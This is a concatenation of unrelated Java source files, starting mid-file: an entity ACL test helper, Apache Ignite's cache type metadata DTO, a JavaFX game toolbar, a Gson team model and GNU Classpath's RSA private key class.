				sortDirection, (new NextPageToken(null)).toToken());
		if (paginated != null) {
			return paginated.getResults();
		}
		return null;
	}

	/**
	 * Helper to create a project and register it for cleanup.
	 *
	 * @param name project name
	 * @param creator user creating the project
	 * @return the freshly loaded project entity
	 */
	private Project createProject(String name, UserInfo creator) {
		String activityId = null;
		Project project = new Project();
		project.setName(name);
		String id = entityManager.createEntity(creator, project, activityId);
		projectsToDelete.add(id);
		return entityManager.getEntity(creator, id, Project.class);
	}

	/**
	 * Helper to grant READ access on an entity to a principal (method name keeps
	 * its historical spelling).
	 *
	 * @param principalId principal receiving READ
	 * @param entityId target entity
	 * @throws Exception on ACL lookup/update failure
	 */
	private void grantReadAcess(Long principalId, String entityId) throws Exception {
		AccessControlList acl = entityAclManager.getACL(entityId, admin);
		ResourceAccess ra = new ResourceAccess();
		ra.setPrincipalId(principalId);
		ra.setAccessType(Sets.newHashSet(ACCESS_TYPE.READ));
		acl.getResourceAccess().add(ra);
		entityAclManager.updateACL(acl, admin);
	}
}
/*
 * Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements.  See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package org.apache.ignite.internal.visor.cache;

import org.apache.ignite.cache.*;
import org.apache.ignite.internal.util.tostring.*;
import org.apache.ignite.internal.util.typedef.internal.*;
import org.apache.ignite.lang.*;

import java.io.*;
import java.util.*;

/**
 * Data transfer object for {@link CacheTypeMetadata}. Replaces {@code Class}
 * references with compacted class-name strings so the metadata can be
 * serialized to Visor without the original classes on the classpath.
 */
public class VisorCacheTypeMetadata implements Serializable {
    /** */
    private static final long serialVersionUID = 0L;

    /** Schema name in database. */
    private String dbSchema;

    /** Table name in database. */
    private String dbTbl;

    /** Key class used to store key in cache. */
    private String keyType;

    /** Value class used to store value in cache. */
    private String valType;

    /** Key fields. */
    @GridToStringInclude
    private Collection<VisorCacheTypeFieldMetadata> keyFields;

    /** Value fields. */
    @GridToStringInclude
    private Collection<VisorCacheTypeFieldMetadata> valFields;

    /** Fields to be queried, in addition to indexed fields. */
    @GridToStringInclude
    private Map<String, String> qryFlds;

    /** Fields to index in ascending order. */
    @GridToStringInclude
    private Map<String, String> ascFlds;

    /** Fields to index in descending order. */
    @GridToStringInclude
    private Map<String, String> descFlds;

    /** Fields to index as text. */
    @GridToStringInclude
    private Collection<String> txtFlds;

    /** Fields to create group indexes for. */
    @GridToStringInclude
    private Map<String, LinkedHashMap<String, IgniteBiTuple<String, Boolean>>> grps;

    /**
     * Converts a collection of cache type metadata configurations into DTOs.
     * A {@code null} input yields an empty (immutable) list.
     *
     * @param types Cache types metadata configurations.
     * @return Data transfer object for cache type metadata configurations.
     */
    public static Collection<VisorCacheTypeMetadata> list(Collection<CacheTypeMetadata> types) {
        if (types == null)
            return Collections.emptyList();

        final Collection<VisorCacheTypeMetadata> cfgs = new ArrayList<>(types.size());

        for (CacheTypeMetadata type : types)
            cfgs.add(from(type));

        return cfgs;
    }

    /**
     * Builds a DTO from a single cache type metadata instance, converting all
     * {@code Class}-valued maps and field lists to their string equivalents.
     *
     * @param m Actual cache type metadata (must not be {@code null}).
     * @return Data transfer object for given cache type metadata.
     */
    public static VisorCacheTypeMetadata from(CacheTypeMetadata m) {
        assert m != null;

        VisorCacheTypeMetadata metadata = new VisorCacheTypeMetadata();

        metadata.dbSchema(m.getDatabaseSchema());
        metadata.dbTbl(m.getDatabaseTable());
        metadata.keyType(m.getKeyType());
        metadata.valType(m.getValueType());

        ArrayList<VisorCacheTypeFieldMetadata> fields = new ArrayList<>(m.getKeyFields().size());

        for (CacheTypeFieldMetadata field : m.getKeyFields())
            fields.add(VisorCacheTypeFieldMetadata.from(field));

        metadata.keyFields(fields);

        // The list is re-created (not reused) so key and value fields stay independent.
        fields = new ArrayList<>(m.getValueFields().size());

        for (CacheTypeFieldMetadata field : m.getValueFields())
            fields.add(VisorCacheTypeFieldMetadata.from(field));

        metadata.valFields(fields);

        metadata.qryFlds(convertFieldsMap(m.getQueryFields()));
        metadata.ascFlds(convertFieldsMap(m.getAscendingFields()));
        metadata.descFlds(convertFieldsMap(m.getDescendingFields()));
        metadata.txtFlds(m.getTextFields());
        metadata.grps(convertGrpsMap(m.getGroups()));

        return metadata;
    }

    /**
     * Convert class object to string class name in the fields map.
     * Preserves iteration order via {@link LinkedHashMap}; names are compacted
     * with {@code U.compact}.
     *
     * @param base Map with class object.
     * @return Map with string class name.
     */
    private static Map<String, String> convertFieldsMap(Map<String, Class<?>> base) {
        Map<String, String> res = new LinkedHashMap<>(base.size());

        for (Map.Entry<String, Class<?>> e : base.entrySet())
            res.put(e.getKey(), U.compact(e.getValue().getName()));

        return res;
    }

    /**
     * Convert class object to string class name in the groups map.
     * Each group maps field name to (class name, ascending flag); only the
     * class is converted, the boolean is carried through unchanged.
     *
     * @param base Map with class object.
     * @return Map with string class name.
     */
    private static Map<String, LinkedHashMap<String, IgniteBiTuple<String, Boolean>>> convertGrpsMap(
        Map<String, LinkedHashMap<String, IgniteBiTuple<Class<?>, Boolean>>> base) {
        Map<String, LinkedHashMap<String, IgniteBiTuple<String, Boolean>>> res = new LinkedHashMap<>(base.size());

        for (Map.Entry<String, LinkedHashMap<String, IgniteBiTuple<Class<?>, Boolean>>> e : base.entrySet()) {
            LinkedHashMap<String, IgniteBiTuple<Class<?>, Boolean>> intBase = e.getValue();

            LinkedHashMap<String, IgniteBiTuple<String, Boolean>> intRes = new LinkedHashMap<>(intBase.size());

            for (Map.Entry<String, IgniteBiTuple<Class<?>, Boolean>> intE : intBase.entrySet()) {
                IgniteBiTuple<Class<?>, Boolean> val = intE.getValue();

                intRes.put(intE.getKey(), new IgniteBiTuple<>(U.compact(val.get1().getName()), val.get2()));
            }

            res.put(e.getKey(), intRes);
        }

        return res;
    }

    /**
     * @param dbSchema New schema name in database.
     */
    public void dbSchema(String dbSchema) {
        this.dbSchema = dbSchema;
    }

    /**
     * @return Schema name in database.
     */
    public String dbSchema() {
        return dbSchema;
    }

    /**
     * @param dbTbl New table name in database.
     */
    public void dbTbl(String dbTbl) {
        this.dbTbl = dbTbl;
    }

    /**
     * @return Table name in database.
     */
    public String dbTbl() {
        return dbTbl;
    }

    /**
     * @param keyType New key class used to store key in cache.
     */
    public void keyType(String keyType) {
        this.keyType = keyType;
    }

    /**
     * @return Key class used to store key in cache.
     */
    public String keyType() {
        return keyType;
    }

    /**
     * @param valType New value class used to store value in cache.
     */
    public void valType(String valType) {
        this.valType = valType;
    }

    /**
     * @return Value class used to store value in cache.
     */
    public String valType() {
        return valType;
    }

    /**
     * @param keyFields New key fields.
     */
    public void keyFields(Collection<VisorCacheTypeFieldMetadata> keyFields) {
        this.keyFields = keyFields;
    }

    /**
     * @return Key fields.
     */
    public Collection<VisorCacheTypeFieldMetadata> keyFields() {
        return keyFields;
    }

    /**
     * @param valFields New value fields.
     */
    public void valFields(Collection<VisorCacheTypeFieldMetadata> valFields) {
        this.valFields = valFields;
    }

    /**
     * @return Value fields.
     */
    public Collection<VisorCacheTypeFieldMetadata> valFields() {
        return valFields;
    }

    /**
     * @param qryFlds New fields to be queried, in addition to indexed fields.
     */
    public void qryFlds(Map<String, String> qryFlds) {
        this.qryFlds = qryFlds;
    }

    /**
     * @return Fields to be queried, in addition to indexed fields.
     */
    public Map<String, String> qryFlds() {
        return qryFlds;
    }

    /**
     * @param ascFlds New fields to index in ascending order.
     */
    public void ascFlds(Map<String, String> ascFlds) {
        this.ascFlds = ascFlds;
    }

    /**
     * @return Fields to index in ascending order.
     */
    public Map<String, String> ascFlds() {
        return ascFlds;
    }

    /**
     * @param descFlds New fields to index in descending order.
     */
    public void descFlds(Map<String, String> descFlds) {
        this.descFlds = descFlds;
    }

    /**
     * @return Fields to index in descending order.
     */
    public Map<String, String> descFlds() {
        return descFlds;
    }

    /**
     * @param txtFlds New fields to index as text.
     */
    public void txtFlds(Collection<String> txtFlds) {
        this.txtFlds = txtFlds;
    }

    /**
     * @return Fields to index as text.
     */
    public Collection<String> txtFlds() {
        return txtFlds;
    }

    /**
     * @param grps New fields to create group indexes for.
     */
    public void grps(Map<String, LinkedHashMap<String, IgniteBiTuple<String, Boolean>>> grps) {
        this.grps = grps;
    }

    /**
     * @return Fields to create group indexes for.
     */
    public Map<String, LinkedHashMap<String, IgniteBiTuple<String, Boolean>>> grps() {
        return grps;
    }
}
package com.ipfaffen.prishonor;

import static com.ipfaffen.prishonor.Game.$;

import javafx.animation.TranslateTransition;
import javafx.beans.binding.Bindings;
import javafx.event.Event;
import javafx.event.EventHandler;
import javafx.geometry.Insets;
import javafx.geometry.Pos;
import javafx.scene.Cursor;
import javafx.scene.Node;
import javafx.scene.image.ImageView;
import javafx.scene.layout.BorderPane;
import javafx.scene.layout.HBox;
import javafx.scene.layout.Pane;
import javafx.scene.layout.VBox;
import javafx.scene.text.Font;
import javafx.scene.text.FontWeight;
import javafx.scene.text.Text;
import javafx.util.Duration;

import com.ipfaffen.prishonor.layout.ToolbarMenu;
import com.ipfaffen.prishonor.type.Opacity;
import com.ipfaffen.prishonor.util.WeakBinder;

/**
 * In-game toolbar: a thin progress divisor on top of a content bar showing
 * points, consumed targets, the selected skill, and stage navigation controls.
 * All nodes are built lazily on first access; texts are bound to game
 * properties through {@link WeakBinder}.
 *
 * @author Isaias Pfaffenseller
 */
public class GameMenu extends ToolbarMenu {

	// Fixed pixel heights of the two stacked panes; set once in the constructor.
	private double divisorHeight;
	private double contentHeight;

	// Lazily-built nodes (each getter creates its node on first call).
	private Pane pane;
	private BorderPane content;
	private Pane divisor;
	private Pane progressBar;

	private ImageView pointsImage;
	private Text pointsText;

	private ImageView consumedTargetImage;
	private Text consumedTargetText;

	private ImageView consumedBonusTargetImage;
	private Text consumedBonusTargetText;

	private ImageView selectedSkillImage;
	private Text selectedSkillUsageLeftText;
	private Text selectedSkillLegendText;

	private ImageView prevStageImage;
	private ImageView nextStageImage;
	private ImageView restartImage;

	private TranslateTransition receivePointsAnimation;

	public GameMenu() {
		divisorHeight = 5;
		contentHeight = 32;
	}

	/** Root pane: divisor (progress bar) stacked above the content bar. */
	@Override
	public Pane pane() {
		if(pane == null) {
			pane = new VBox();
			pane.setPrefHeight(getHeight());
			pane.getChildren().add(divisor());
			pane.getChildren().add(content());
		}
		return pane;
	}

	/**
	 * Content bar: points/targets (and skill info when a skill is selected) on
	 * the left, stage navigation and restart buttons on the right.
	 *
	 * @return lazily-built content pane
	 */
	public BorderPane content() {
		if(content == null) {
			HBox leftPane = new HBox(10);
			leftPane.setAlignment(Pos.CENTER_LEFT);
			leftPane.getChildren().addAll(pointsImage(), pointsText());
			leftPane.getChildren().addAll(consumedTargetImage(), consumedTargetText());
			leftPane.getChildren().addAll(consumedBonusTargetImage(), consumedBonusTargetText());

			if($.skill.hasSkill()) {
				leftPane.getChildren().addAll(selectedSkillImage(), selectedSkillUsageLeftText(), selectedSkillLegendText());
			}

			HBox rightPane = new HBox(15);
			rightPane.getChildren().addAll(prevStageImage(), nextStageImage(), restartImage());

			content = new BorderPane();
			content.setPrefHeight(contentHeight);
			content.setPadding(new Insets(4, 8, 1, 8));
			content.setStyle(String.format("-fx-background-color:%s;", R.color.base_background));
			content.setLeft(leftPane);
			content.setRight(rightPane);
		}
		return content;
	}

	/**
	 * Divisor strip that hosts the progress bar.
	 *
	 * @return lazily-built divisor pane
	 */
	public Pane divisor() {
		if(divisor == null) {
			divisor = new Pane();
			divisor.setPrefHeight(divisorHeight);
			divisor.setStyle(String.format("-fx-background-color:%s;", R.color.target_empty_progres_bar));
			divisor.getChildren().add(progressBar());
		}
		return divisor;
	}

	/**
	 * Progress bar overlay inside the divisor (width is presumably driven
	 * elsewhere — not set here).
	 *
	 * @return lazily-built progress bar pane
	 */
	public Pane progressBar() {
		if(progressBar == null) {
			progressBar = new Pane();
			progressBar.setPrefHeight(divisorHeight);
			progressBar.setStyle("-fx-background-color:black;");
		}
		return progressBar;
	}

	/**
	 * Re-weights the menu options: target counters become fully visible, skill
	 * info fades, and "next stage" unlocks once the bronze-medal score is
	 * reached (unless already on the last stage).
	 *
	 * @param points current stage points
	 */
	public void arrangeOptions(int points) {
		double opacity = Opacity.FULLY_VISIBLE;
		consumedTargetImage().setOpacity(opacity);
		consumedTargetText().setOpacity(opacity);
		consumedBonusTargetImage().setOpacity(opacity);
		consumedBonusTargetText().setOpacity(opacity);

		opacity = Opacity.BARELY_VISIBLE;
		selectedSkillImage().setOpacity(opacity);
		selectedSkillUsageLeftText().setOpacity(opacity);
		selectedSkillLegendText().setOpacity(opacity);

		if(nextStageImage().isDisable() && !$.isLastStage() && points >= $.stage.getBronzeMedalPoints()) {
			enable(nextStageImage());
		}
	}

	/** @return lazily-built points icon */
	public ImageView pointsImage() {
		if(pointsImage == null) {
			pointsImage = createImageView(R.image.points);
			pointsImage.setTranslateY(-1.5);
			pointsImage.setFitHeight(14);
		}
		return pointsImage;
	}

	/** @return lazily-built points label, bound to the points property */
	public Text pointsText() {
		if(pointsText == null) {
			pointsText = createText();
			pointsText.setFont(Font.font(R.main.base_font, FontWeight.BOLD, 20));
			WeakBinder.get().bind(pointsText.textProperty(), $.properties.pointsProperty().asString());
		}
		return pointsText;
	}

	/** @return lazily-built consumed-targets icon (starts barely visible) */
	public ImageView consumedTargetImage() {
		if(consumedTargetImage == null) {
			consumedTargetImage = createImageView(R.image.target);
			consumedTargetImage.setOpacity(Opacity.BARELY_VISIBLE);
			consumedTargetImage.setFitHeight(14);
		}
		return consumedTargetImage;
	}

	/** @return lazily-built consumed-targets counter, bound to the game property */
	public Text consumedTargetText() {
		if(consumedTargetText == null) {
			consumedTargetText = createText();
			consumedTargetText.setOpacity(Opacity.BARELY_VISIBLE);
			WeakBinder.get().bind(consumedTargetText.textProperty(), $.properties.consumedTargetsProperty().asString());
		}
		return consumedTargetText;
	}

	/** @return lazily-built bonus-targets icon (starts barely visible) */
	public ImageView consumedBonusTargetImage() {
		if(consumedBonusTargetImage == null) {
			consumedBonusTargetImage = createImageView(R.image.target_bonus);
			consumedBonusTargetImage.setOpacity(Opacity.BARELY_VISIBLE);
			consumedBonusTargetImage.setFitHeight(14);
		}
		return consumedBonusTargetImage;
	}

	/** @return lazily-built bonus-targets counter, bound to the game property */
	public Text consumedBonusTargetText() {
		if(consumedBonusTargetText == null) {
			consumedBonusTargetText = createText();
			consumedBonusTargetText.setOpacity(Opacity.BARELY_VISIBLE);
			WeakBinder.get().bind(consumedBonusTargetText.textProperty(), $.properties.consumedBonusTargetsProperty().asString());
		}
		return consumedBonusTargetText;
	}

	/** @return lazily-built selected-skill icon, image bound to the skill selection */
	public ImageView selectedSkillImage() {
		if(selectedSkillImage == null) {
			selectedSkillImage = createImageView(R.image.points);
			selectedSkillImage.setFitHeight(20);
			selectedSkillImage.setTranslateX(30);
			WeakBinder.get().bind(selectedSkillImage.imageProperty(), $.skill.selectedImageProperty());
		}
		return selectedSkillImage;
	}

	/** @return lazily-built "xN" label for remaining skill uses */
	public Text selectedSkillUsageLeftText() {
		if(selectedSkillUsageLeftText == null) {
			selectedSkillUsageLeftText = createText();
			selectedSkillUsageLeftText.setTranslateX(30);
			WeakBinder.get().bind(selectedSkillUsageLeftText.textProperty(), Bindings.format("x%s", $.skill.selectedUsageLeftProperty().asString()));
		}
		return selectedSkillUsageLeftText;
	}

	/** @return lazily-built skill legend label, bound to the selected skill's legend */
	public Text selectedSkillLegendText() {
		if(selectedSkillLegendText == null) {
			selectedSkillLegendText = createText();
			selectedSkillLegendText.setTranslateX(30);
			WeakBinder.get().bind(selectedSkillLegendText.textProperty(), $.skill.selectedLegendProperty());
		}
		return selectedSkillLegendText;
	}

	/** @return lazily-built "previous stage" button; disabled on the first stage */
	public ImageView prevStageImage() {
		if(prevStageImage == null) {
			prevStageImage = createImageView(R.image.prev, true);
			prevStageImage.setFitHeight(20);
			prevStageImage.setTranslateY(2);
			prevStageImage.setCursor(Cursor.HAND);
			prevStageImage.setPickOnBounds(true);
			prevStageImage.setOnMouseClicked(new EventHandler<Event>() {
				public void handle(Event event) {
					$.prevStage();
				};
			});

			if($.isFirstStage()) {
				disable(prevStageImage);
			}
		}
		return prevStageImage;
	}

	/** @return lazily-built "next stage" button; disabled until the stage was beaten */
	public ImageView nextStageImage() {
		if(nextStageImage == null) {
			nextStageImage = createImageView(R.image.next, true);
			nextStageImage.setFitHeight(20);
			nextStageImage.setTranslateY(2);
			nextStageImage.setCursor(Cursor.HAND);
			nextStageImage.setPickOnBounds(true);
			nextStageImage.setOnMouseClicked(new EventHandler<Event>() {
				public void handle(Event event) {
					$.nextStage();
				};
			});

			if(!$.isAlreadyBeatStage()) {
				disable(nextStageImage);
			}
		}
		return nextStageImage;
	}

	/** @return lazily-built restart button */
	public ImageView restartImage() {
		if(restartImage == null) {
			restartImage = createImageView(R.image.restart, true);
			restartImage.setFitHeight(20);
			restartImage.setTranslateY(2);
			restartImage.setCursor(Cursor.HAND);
			restartImage.setPickOnBounds(true);
			restartImage.setOnMouseClicked(new EventHandler<Event>() {
				public void handle(Event event) {
					$.restart();
				};
			});
		}
		return restartImage;
	}

	/**
	 * Disables a node and dims it.
	 *
	 * @param node node to disable
	 */
	public void disable(Node node) {
		node.setDisable(true);
		node.setOpacity(Opacity.BARELY_VISIBLE);
	}

	/**
	 * Enables a node and restores full opacity.
	 *
	 * @param node node to enable
	 */
	public void enable(Node node) {
		node.setDisable(false);
		node.setOpacity(Opacity.FULLY_VISIBLE);
	}

	/** Plays the small bounce animation on the points label. */
	public void receivePoints() {
		receivePointsAnimation().playFromStart();
	}

	/** @return lazily-built points bounce animation (down and back, 100 ms each way) */
	public TranslateTransition receivePointsAnimation() {
		if(receivePointsAnimation == null) {
			receivePointsAnimation = new TranslateTransition(Duration.millis(100), pointsText());
			receivePointsAnimation.setCycleCount(2);
			receivePointsAnimation.setAutoReverse(true);
			receivePointsAnimation.setFromY(pointsText().getTranslateY());
			receivePointsAnimation.setToY(2);
		}
		return receivePointsAnimation;
	}

	/** @return total menu height (content bar plus divisor) */
	public double getHeight() {
		return (contentHeight + divisorHeight);
	}
}
package de.lukasniemeier.gamecenterlivesender.model.teams;

import com.google.gson.annotations.Expose;

/**
 * Gson-mapped team record. Plain mutable POJO: every field is {@link Expose}d
 * for (de)serialization and wrapped by a trivial getter/setter pair; no
 * validation is performed.
 */
public class Team {

    @Expose
    private String code;
    @Expose
    private String name;
    @Expose
    private String city;
    @Expose
    private String division;
    @Expose
    private String conference;
    @Expose
    private Integer teamID;
    @Expose
    private String logoURL;
    @Expose
    private String sponsors;
    @Expose
    private String ticketURL;
    @Expose
    private String compositeColor;
    @Expose
    private String venue;
    @Expose
    private String twitter;
    @Expose
    private String primaryColor;
    @Expose
    private String secondaryColor;
    @Expose
    private String liveAudio;
    @Expose
    private String audioIos;
    @Expose
    private String audioDroid;
    @Expose
    private String iosId;
    @Expose
    private String androidId;

    /** @return The code */
    public String getCode() {
        return code;
    }

    /** @param code The code */
    public void setCode(String code) {
        this.code = code;
    }

    /** @return The name */
    public String getName() {
        return name;
    }

    /** @param name The name */
    public void setName(String name) {
        this.name = name;
    }

    /** @return The city */
    public String getCity() {
        return city;
    }

    /** @param city The city */
    public void setCity(String city) {
        this.city = city;
    }

    /** @return The division */
    public String getDivision() {
        return division;
    }

    /** @param division The division */
    public void setDivision(String division) {
        this.division = division;
    }

    /** @return The conference */
    public String getConference() {
        return conference;
    }

    /** @param conference The conference */
    public void setConference(String conference) {
        this.conference = conference;
    }

    /** @return The teamID */
    public Integer getTeamID() {
        return teamID;
    }

    /** @param teamID The teamID */
    public void setTeamID(Integer teamID) {
        this.teamID = teamID;
    }

    /** @return The logoURL */
    public String getLogoURL() {
        return logoURL;
    }

    /** @param logoURL The logoURL */
    public void setLogoURL(String logoURL) {
        this.logoURL = logoURL;
    }

    /** @return The sponsors */
    public String getSponsors() {
        return sponsors;
    }

    /** @param sponsors The sponsors */
    public void setSponsors(String sponsors) {
        this.sponsors = sponsors;
    }

    /** @return The ticketURL */
    public String getTicketURL() {
        return ticketURL;
    }

    /** @param ticketURL The ticketURL */
    public void setTicketURL(String ticketURL) {
        this.ticketURL = ticketURL;
    }

    /** @return The compositeColor */
    public String getCompositeColor() {
        return compositeColor;
    }

    /** @param compositeColor The compositeColor */
    public void setCompositeColor(String compositeColor) {
        this.compositeColor = compositeColor;
    }

    /** @return The venue */
    public String getVenue() {
        return venue;
    }

    /** @param venue The venue */
    public void setVenue(String venue) {
        this.venue = venue;
    }

    /** @return The twitter */
    public String getTwitter() {
        return twitter;
    }

    /** @param twitter The twitter */
    public void setTwitter(String twitter) {
        this.twitter = twitter;
    }

    /** @return The primaryColor */
    public String getPrimaryColor() {
        return primaryColor;
    }

    /** @param primaryColor The primaryColor */
    public void setPrimaryColor(String primaryColor) {
        this.primaryColor = primaryColor;
    }

    /** @return The secondaryColor */
    public String getSecondaryColor() {
        return secondaryColor;
    }

    /** @param secondaryColor The secondaryColor */
    public void setSecondaryColor(String secondaryColor) {
        this.secondaryColor = secondaryColor;
    }

    /** @return The liveAudio */
    public String getLiveAudio() {
        return liveAudio;
    }

    /** @param liveAudio The liveAudio */
    public void setLiveAudio(String liveAudio) {
        this.liveAudio = liveAudio;
    }

    /** @return The audioIos */
    public String getAudioIos() {
        return audioIos;
    }

    /** @param audioIos The audioIos */
    public void setAudioIos(String audioIos) {
        this.audioIos = audioIos;
    }

    /** @return The audioDroid */
    public String getAudioDroid() {
        return audioDroid;
    }

    /** @param audioDroid The audioDroid */
    public void setAudioDroid(String audioDroid) {
        this.audioDroid = audioDroid;
    }

    /** @return The iosId */
    public String getIosId() {
        return iosId;
    }

    /** @param iosId The iosId */
    public void setIosId(String iosId) {
        this.iosId = iosId;
    }

    /** @return The androidId */
    public String getAndroidId() {
        return androidId;
    }

    /** @param androidId The androidId */
    public void setAndroidId(String androidId) {
        this.androidId = androidId;
    }
}
/* GnuRSAPrivateKey.java -- Copyright 2001, 2002, 2003, 2006 Free Software Foundation, Inc. This file is a part of GNU Classpath. GNU Classpath is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. GNU Classpath is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GNU Classpath; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA Linking this library statically or dynamically with other modules is making a combined work based on this library. Thus, the terms and conditions of the GNU General Public License cover the whole combination. As a special exception, the copyright holders of this library give you permission to link this library with independent modules to produce an executable, regardless of the license terms of these independent modules, and to copy and distribute the resulting executable under terms of your choice, provided that you also meet, for each linked independent module, the terms and conditions of the license of that module. An independent module is a module which is not derived from or based on this library. If you modify this library, you may extend this exception to your version of the library, but you are not obligated to do so. If you do not wish to do so, delete this exception statement from your version. 
*/ package gnu.java.security.key.rsa; import gnu.java.security.Configuration; import gnu.java.security.action.GetPropertyAction; import gnu.java.security.Registry; import gnu.java.security.key.IKeyPairCodec; import java.math.BigInteger; import java.security.AccessController; import java.security.PrivateKey; import java.security.interfaces.RSAPrivateCrtKey; import java.security.interfaces.RSAPrivateKey; /** * An object that embodies an RSA private key. * <p> * References: * <ol> * <li><a * href="http://www.cosic.esat.kuleuven.ac.be/nessie/workshop/submissions/rsa-pss.zip"> * RSA-PSS Signature Scheme with Appendix, part B.</a><br> * Primitive specification and supporting documentation.<br> * Jakob Jonsson and Burt Kaliski.</li> * </ol> */ public class GnuRSAPrivateKey extends GnuRSAKey implements PrivateKey, RSAPrivateCrtKey { /** The first prime divisor of the modulus. */ private final BigInteger p; /** The second prime divisor of the modulus. */ private final BigInteger q; /** The private exponent of an RSA private key. */ private final BigInteger d; /** The first factor's exponent. */ private final BigInteger dP; /** The second factor's exponent. */ private final BigInteger dQ; /** The CRT (Chinese Remainder Theorem) coefficient. */ private final BigInteger qInv; /** String representation of this key. Cached for speed. */ private transient String str; /** * Convenience constructor. Calls the constructor with 5 arguments passing * {@link Registry#RAW_ENCODING_ID} as the identifier of the preferred * encoding format. * * @param p the modulus first prime divisor. * @param q the modulus second prime divisor. * @param e the public exponent. * @param d the private exponent. */ public GnuRSAPrivateKey(BigInteger p, BigInteger q, BigInteger e, BigInteger d) { this(Registry.RAW_ENCODING_ID, p, q, e, d); } /** * Constructs a new instance of a <code>GnuRSAPrivateKey</code> given the * designated arguments. 
* * @param preferredFormat the indetifier of the preferred encoding format to * use when externalizing this key. * @param p the modulus first prime divisor. * @param q the modulus second prime divisor. * @param e the public exponent. * @param d the private exponent. */ public GnuRSAPrivateKey(int preferredFormat, BigInteger p, BigInteger q, BigInteger e, BigInteger d) { this(preferredFormat, p.multiply(q), e, d, p, q, e.modInverse(p.subtract(BigInteger.ONE)), e.modInverse(q.subtract(BigInteger.ONE)), q.modInverse(p)); } /** * Constructs a new instance of a <code>GnuRSAPrivateKey</code> given the * designated arguments. * * @param preferredFormat the indetifier of the preferred encoding format to * use when externalizing this key. * @param n the public modulus, which is also the product of <code>p</code> * and <code>q</code>. * @param e the public exponent. * @param d the private exponent. * @param p the modulus first prime divisor. * @param q the modulus second prime divisor. * @param dP the first prime's exponen. A positive integer less than * <code>p</code> and <code>q</code>, satisfying * <code>e * dP = 1 (mod p-1)</code>. * @param dQ the second prime's exponent. A positive integer less than * <code>p</code> and <code>q</code>, satisfying * <code>e * dQ = 1 (mod p-1)</code>. * @param qInv the Chinese Remainder Theorem coefiicient. A positive integer * less than <code>p</code>, satisfying * <code>q * qInv = 1 (mod p)</code>. */ public GnuRSAPrivateKey(int preferredFormat, BigInteger n, BigInteger e, BigInteger d, BigInteger p, BigInteger q, BigInteger dP, BigInteger dQ, BigInteger qInv) { super(preferredFormat == Registry.ASN1_ENCODING_ID ? 
Registry.PKCS8_ENCODING_ID : preferredFormat, n, e); this.d = d; this.p = p; this.q = q; // the exponents dP and dQ are positive integers less than p and q // respectively satisfying // e * dP = 1 (mod p-1); // e * dQ = 1 (mod q-1), this.dP = dP; this.dQ = dQ; // the CRT coefficient qInv is a positive integer less than p satisfying // q * qInv = 1 (mod p). this.qInv = qInv; } /** * A class method that takes the output of the <code>encodePrivateKey()</code> * method of an RSA keypair codec object (an instance implementing * {@link IKeyPairCodec} for RSA keys, and re-constructs an instance of this * object. * * @param k the contents of a previously encoded instance of this object. * @throws ArrayIndexOutOfBoundsException if there is not enough bytes, in * <code>k</code>, to represent a valid encoding of an instance * of this object. * @throws IllegalArgumentException if the byte sequence does not represent a * valid encoding of an instance of this object. */ public static GnuRSAPrivateKey valueOf(final byte[] k) { // try RAW codec if (k[0] == Registry.MAGIC_RAW_RSA_PRIVATE_KEY[0]) try { return (GnuRSAPrivateKey) new RSAKeyPairRawCodec().decodePrivateKey(k); } catch (IllegalArgumentException ignored) { } // try PKCS#8 codec return (GnuRSAPrivateKey) new RSAKeyPairPKCS8Codec().decodePrivateKey(k); } public BigInteger getPrimeP() { return p; } public BigInteger getPrimeQ() { return q; } public BigInteger getPrimeExponentP() { return dP; } public BigInteger getPrimeExponentQ() { return dQ; } public BigInteger getCrtCoefficient() { return qInv; } public BigInteger getPrivateExponent() { return d; } /** * Returns the encoded form of this private key according to the designated * format. * * @param format the desired format identifier of the resulting encoding. * @return the byte sequence encoding this key according to the designated * format. * @throws IllegalArgumentException if the format is not supported. 
* @see RSAKeyPairRawCodec * @see RSAKeyPairPKCS8Codec */ public byte[] getEncoded(int format) { final byte[] result; switch (format) { case IKeyPairCodec.RAW_FORMAT: result = new RSAKeyPairRawCodec().encodePrivateKey(this); break; case IKeyPairCodec.PKCS8_FORMAT: result = new RSAKeyPairPKCS8Codec().encodePrivateKey(this); break; default: throw new IllegalArgumentException("Unsupported encoding format: " + format); } return result; } /** * Returns <code>true</code> if the designated object is an instance of this * class and has the same RSA parameter values as this one. * * @param obj the other non-null RSA key to compare to. * @return <code>true</code> if the designated object is of the same type * and value as this one. */ public boolean equals(final Object obj) { if (obj == null) return false; if (obj instanceof RSAPrivateKey) { final RSAPrivateKey that = (RSAPrivateKey) obj; return super.equals(that) && d.equals(that.getPrivateExponent()); } if (obj instanceof RSAPrivateCrtKey) { final RSAPrivateCrtKey that = (RSAPrivateCrtKey) obj; return super.equals(that) && p.equals(that.getPrimeP()) && q.equals(that.getPrimeQ()) && dP.equals(that.getPrimeExponentP()) && dQ.equals(that.getPrimeExponentQ()) && qInv.equals(that.getCrtCoefficient()); } return false; } public String toString() { if (str == null) { String ls = (String) AccessController.doPrivileged (new GetPropertyAction("line.separator")); str = new StringBuilder(this.getClass().getName()).append("(") .append(super.toString()).append(",").append(ls) .append("d=0x").append(Configuration.DEBUG ? d.toString(16) : "**...*").append(ls) .append("p=0x").append(Configuration.DEBUG ? p.toString(16) : "**...*").append(ls) .append("q=0x").append(Configuration.DEBUG ? q.toString(16) : "**...*").append(ls) .append("dP=0x").append(Configuration.DEBUG ? dP.toString(16) : "**...*").append(ls) .append("dQ=0x").append(Configuration.DEBUG ? dQ.toString(16) : "**...*").append(ls) .append("qInv=0x").append(Configuration.DEBUG ? 
qInv.toString(16) : "**...*").append(ls) .append(")") .toString(); } return str; } }
/*
